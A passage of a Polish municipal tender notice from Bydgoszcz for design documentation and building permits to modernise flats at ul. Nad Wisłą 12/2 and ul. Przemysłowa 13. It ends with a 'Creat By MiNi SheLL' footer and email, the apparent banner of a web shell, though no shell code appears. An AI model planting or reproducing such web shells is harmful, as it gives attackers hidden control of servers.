- prace branży wodno-kanalizacyjnej (wymiana/wykonanie nowej instalacji wod.-kan. z uwzględnieniem prawidłowego podłączenia do kanalizacji sanitarnej, wyposażenie lokalu w urządzenia sanitarne wraz z wykonaniem podłączeń wod.-kan.)
- prace branży gazowej (wykonanie inwentaryzacji budowlanej na podstawie, której należy zaprojektować wykonanie instalacji gazowej do urządzeń, dobór kotła gazowego dwufunkcyjnego, instalacji c.o. i c.w.u. wraz z doborem grzejników. Należy uzyskać opinię kominiarską o dostępności przewodów spalinowych i wentylacyjnych)
- wymiana stolarki okiennej i drzwiowej :
a) wymianę stolarki okiennej drewnianej na PCV (z zachowaniem podziału i kształtu okien) wraz z wyposażeniem jej w nawiewniki okienne higrosterowalne 
b)  wymianę stolarki drzwiowej 
Szczegółowy zakres  zamówienia  obejmuje:
1) wykonanie dokumentacji (wielobranżowy projekt budowlany) uwzględniającej wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 

b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na poszczególne rodzaje robót: branże budowlana, elektryczna, sanitarna (wod.-kan, gaz), instalacja grzewcza. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz., z                  podziałem na części - tak jak kosztorys inwestorski
c) szczegółowa specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji                papierowej - 3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,
2) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i                 zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii itp. dokumentów do opracowania dokumentacji projektowej oraz  do uzyskania decyzji  pozwolenia na wykonanie robót,
3)  uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji            Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Pozostałe  warunki  realizacji  zamówienia:
1) Zamawiający przekaże Wykonawcy, wybranemu do realizacji zamówienia - stosowne pełnomocnictwo (na pisemne żądanie) - w celu uzyskania przez niego niezbędnych opinii ( w tym Miejskiego Konserwatora Zabytków - jeżeli zajdzie taka konieczność), uzgodnień, koniecznych do opracowania dokumentacji                   projektowej oraz uzyskania decyzji pozwolenia na wykonanie robót budowlanych. 
2) rozliczenie wynagrodzenia wykonawcy nastąpi jedną fakturą/rachunkiem, po wykonaniu całego świadczenia, obejmującego opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie decyzji               pozwolenia na wykonanie robót budowlanych objętych projektem.
3) Zamawiający przekaże Wykonawcy wybranemu do realizacji zamówienia - opinię kominiarską, którą należy uwzględnić w dokumentacji projektowej oraz warunki przyłączenia do sieci gazowej.
4) przed przystąpieniem do prac projektowych - Wykonawca zobowiązany jest przedstawić Zamawiającemu do akceptacji - koncepcję modernizacji lokalu mieszkalnego
Termin opracowania dokumentacji projektowo - kosztorysowej i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót  w ciągu :  50 dni  od daty  podpisania umowy przez Wykonawcę.
2) termin dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji projektowo-kosztorysowej w ciągu 7 dni od daty wydania decyzji pozwolenia, nie później jednak niż  w terminie  120  dni  od  daty  podpisania umowy przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania  dokumentacji projektowo-kosztorysowej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 6/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4:  obejmuje opracowanie dokumentacji projektowo-kosztorysowej na wykonanie modernizacji lokalu mieszkalnego przy ul. Nad Wisłą 12/2  wraz z likwidacją schodów zewnętrznych do             lokalu nr 3 i wykonaniem wejścia do lokalu nr 3 z przedpokoju lokalu nr 2  oraz uzyskanie przez                     Wykonawcę decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową. Dokumentacja winna uwzględniać zmianę funkcji pomieszczeń polegającą na wydzieleniu w obrębie lokalu nr 2 pomieszczenia kuchni i łazienki (w.c.) oraz wymianę ogrzewania w lokalu  (preferowane ogrzewanie węglowe).
Zakres dokumentacji projektowej modernizacji (remontu) lokalu  winien obejmować m. in.:
- prace branży budowlanej (m. in. remont podłóg, remont ścian - likwidacja wilgoci, wykonanie tynków wewnętrznych i prace malarskie, likwidacja schodów zewnętrznych do lokalu nr 3, wykonanie wejścia do lokalu nr 3 z przedpokoju lokalu nr 2,  wykonanie wentylacji pomieszczeń kuchni i łazienki lub wc.)
- prace branży elektrycznej (zaprojektowanie podłączenia nowopowstałej klatki schodowej dla lokali nr 2 i 3 do licznika administracyjnego znajdującego się w korytarzu przy lokalu nr 1, dostosowanie instalacji elektrycznej w lokalu nr 2 do nowej funkcji pomieszczeń),
- prace branży wodno-kanalizacyjnej (wymiana/wykonanie nowej instalacji wod.-kan. z uwzględnieniem prawidłowego podłączenia do kanalizacji sanitarnej, wyposażenie lokalu w urządzenia sanitarne wraz z wykonaniem podłączeń wod.-kan.)


- wymiana stolarki okiennej i drzwiowej :
a)  wymianę stolarki okiennej drewnianej (historyczna) na drewnianą (z zachowaniem podziału i kształtu okien) wraz z wyposażeniem jej w nawiewniki okienne higrosterowalne.
b) wymianę stolarki drzwiowej 
Szczegółowy zakres  zamówienia  obejmuje:
1) wykonanie dokumentacji (wielobranżowy projekt budowlany) uwzględniającej wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na poszczególne rodzaje robót: branże budowlana, elektryczna, sanitarna (wod.-kan, gaz), instalacja grzewcza. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.,                       z  podziałem na części -  tak jak kosztorys inwestorski
c) szczegółowa specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji                papierowej - 3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,
2) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i                 zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii itp. dokumentów do opracowania dokumentacji projektowej oraz  do uzyskania decyzji  pozwolenia na wykonanie robót,
3)  uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji            Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Pozostałe  warunki  realizacji  zamówienia:
1) Zamawiający przekaże Wykonawcy, wybranemu do realizacji zamówienia - stosowne pełnomocnictwo (na pisemne żądanie) - w celu uzyskania przez niego niezbędnych opinii ( w tym Miejskiego Konserwatora Zabytków - jeżeli zajdzie taka konieczność), uzgodnień, koniecznych do opracowania dokumentacji                   projektowej oraz uzyskania decyzji pozwolenia na wykonanie robót budowlanych. 
2) rozliczenie wynagrodzenia wykonawcy nastąpi jedną fakturą/rachunkiem, po wykonaniu całego świadczenia, obejmującego opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie decyzji               pozwolenia na wykonanie robót budowlanych objętych projektem.
3) Zamawiający przekaże Wykonawcy wybranemu do realizacji zamówienia - opinię kominiarską, którą należy uwzględnić w dokumentacji projektowej oraz warunki przyłączenia do sieci gazowej.
4) przed przystąpieniem do prac projektowych - Wykonawca zobowiązany jest przedstawić Zamawiającemu do akceptacji - koncepcję modernizacji lokalu mieszkalnego.
Termin opracowania dokumentacji projektowo - kosztorysowej i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót  w ciągu :  50 dni  od daty  podpisania umowy przez Wykonawcę.
2) termin dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji projektowo-kosztorysowej w ciągu 7 dni od daty wydania decyzji pozwolenia, nie później jednak niż  w terminie  120  dni  od  daty  podpisania umowy przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania  dokumentacji projektowo-kosztorysowej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 6/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5: obejmuje opracowanie dokumentacji projektowo-kosztorysowej na wykonanie scalenia lokali mieszkalnych nr 1 i 1a  w budynku przy ul. Przemysłowej 13 wraz z uzyskaniem przez Wykonawcę decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową. Dokumentacja winna uwzględniać zmianę funkcji pomieszczeń polegającą na wydzieleniu w  obrębie scalonego lokalu pomieszczenia łazienki (lub w.c.)oraz wykonanie ogrzewania w lokalu (preferowane ogrzewanie węglowe).

Zakres dokumentacji projektowej modernizacji (remontu) lokalu  winien obejmować m. in.:
- prace branży budowlanej (m. in. remont podłóg, remont ścian - likwidacja wilgoci, wykonanie tynków wewnętrznych i prace malarskie,  wykonanie wentylacji pomieszczeń kuchni i łazienki  lub wc).
- prace branży elektrycznej (wymiana instalacji elektrycznej wraz z osprzętem),
- prace branży wodno-kanalizacyjnej (wymiana/wykonanie nowej instalacji wod.-kan. z uwzględnieniem prawidłowego podłączenia do kanalizacji sanitarnej, wyposażenie lokalu w urządzenia sanitarne wraz          z wykonaniem podłączeń wod.-kan.)
- wymiana stolarki okiennej i drzwiowej :
a) wymianę stolarki okiennej drewnianej na PCV (z zachowaniem podziału i kształtu okien) wraz z wyposażeniem jej w nawiewniki okienne higrosterowlane 
b)  wymianę stolarki drzwiowej 
Szczegółowy zakres  zamówienia  obejmuje:
1) wykonanie dokumentacji (wielobranżowy projekt budowlany) uwzględniającej wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na poszczególne rodzaje robót: branże budowlana, elektryczna, sanitarna (wod.-kan, gaz), instalacja grzewcza. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz., z                  podziałem na części - tak jak kosztorys inwestorski
c) szczegółowa specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji                papierowej - 3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,
2) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i                 zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii itp. dokumentów do opracowania dokumentacji projektowej oraz  do uzyskania decyzji  pozwolenia na wykonanie robót,
3)  uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji            Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Pozostałe  warunki  realizacji  zamówienia:
1) Zamawiający przekaże Wykonawcy, wybranemu do realizacji zamówienia - stosowne pełnomocnictwo (na pisemne żądanie) - w celu uzyskania przez niego niezbędnych opinii ( w tym Miejskiego Konserwatora Zabytków - jeżeli zajdzie taka konieczność), uzgodnień, koniecznych do opracowania dokumentacji                   projektowej oraz uzyskania decyzji pozwolenia na wykonanie robót budowlanych. 
2) rozliczenie wynagrodzenia wykonawcy nastąpi jedną fakturą/rachunkiem, po wykonaniu całego świadczenia, obejmującego opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie decyzji               pozwolenia na wykonanie robót budowlanych objętych projektem.
3) Zamawiający przekaże Wykonawcy wybranemu do realizacji zamówienia - opinię kominiarską, którą należy uwzględnić w dokumentacji projektowej oraz warunki przyłączenia do sieci gazowej.
4) przed przystąpieniem do prac projektowych - Wykonawca zobowiązany jest przedstawić Zamawiającemu do akceptacji - koncepcję modernizacji lokalu mieszkalnego.

Termin opracowania dokumentacji projektowo - kosztorysowej i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót  w ciągu :  50 dni  od daty  podpisania umowy przez Wykonawcę.
2) termin dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji projektowo-kosztorysowej w ciągu 7 dni od daty wydania decyzji pozwolenia, nie później jednak niż  w terminie  120  dni  od  daty  podpisania umowy przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania  dokumentacji projektowo-kosztorysowej - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com